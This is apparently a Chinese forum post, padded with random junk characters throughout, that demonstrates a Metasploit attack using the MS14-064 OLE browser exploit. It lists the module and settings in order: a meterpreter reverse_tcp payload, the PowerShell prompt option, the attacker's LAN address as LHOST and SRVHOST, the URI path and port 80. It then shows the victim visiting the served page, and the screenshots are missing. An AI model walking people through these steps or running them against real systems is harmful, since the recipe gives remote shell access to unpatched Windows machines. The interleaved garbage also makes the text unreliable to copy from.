' v; f8 _* n# E+ \( f8 I$ ? 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示# A0 E2 r8 Q3 E$ Q U7 [$ \
* ]( s. X8 a2 t. f* ~
) Y$ N0 r! x: p/ s7 ~1 g; u% N$ A# \ 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
5 `' G6 x8 H0 D' E
# Q! s( H4 E/ a8 L V" a$ j* l8 G1 i+ v- J
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
+ H" ^4 A5 ]0 e0 r" L
3 E/ C6 q% z3 v! _1 z
) f$ ~' A' H! F# L set AllowPowershellPrompt true
- ~) j7 F% j9 H! ^( S
i: H9 U' r4 e( r7 i; o
) X. y8 C) i) y6 L, F* A Set LHOST 192.168.0.109* z2 N0 _: I8 H4 p7 l$ `3 Q
. }0 ^7 J3 v d, q/ \9 Q# Z/ l: |
set SRVHOST 192.168.0.109/ @6 I. ?% V$ ?- o5 ?4 ]- Z, _
) [! u. a' }5 N0 O6 j0 u
1 o+ s0 @' }, O Set uripath share, E0 B; K+ J' O9 ?5 `7 l, Z
2 B9 J+ K' m9 H
: V6 n o- U; {8 u( j$ O9 C Set srvport 80
% a) k, ]/ q( O
* r% T2 L9 N( x% i) r3 {" H
& ^7 L5 r1 A5 ?- c! O
5 F+ k6 v" `8 L4 H% {( [
' E4 n9 {/ s3 B" e6 q
6 X% Q6 C7 |& x8 X' c
- {, R3 m' p2 }: }
! }4 `! T X7 v. a. [9 M7 V
$ W1 g5 Z+ P4 s1 Z* e% P9 b
+ O) T( S2 \2 v
/ @% d) f; ]) m! c" `$ B
- T# G, |4 I+ K 5 N9 k. Q" a1 [" v7 x
( u4 J* H' t5 w/ M. q1 U& P9 d& J" O- W, t9 ~- s) E
/ X! W) N0 K9 E# B6 V* H
4 E' z+ L% q% O6 ^
9 E& ~7 b; }8 o3 v 下面我们来访问本地地址如图:7 z, x' o& b0 ^: y: O3 f; V8 n! b/ o
+ G/ r# _9 G9 M( y2 L8 u
) Z; e5 _0 O+ [, O. Q% F H" U
% E# u+ c. S3 M" ~& m8 X
. P# F( s3 I. S& o d( z
. ]2 W4 M4 e" i- E' W) s / n* J; k! C2 e
" d8 j2 T- Q0 R* n3 i, U) R
. m/ E3 X) L3 t. T
- }% i9 o3 H& V+ G3 u/ J8 P. j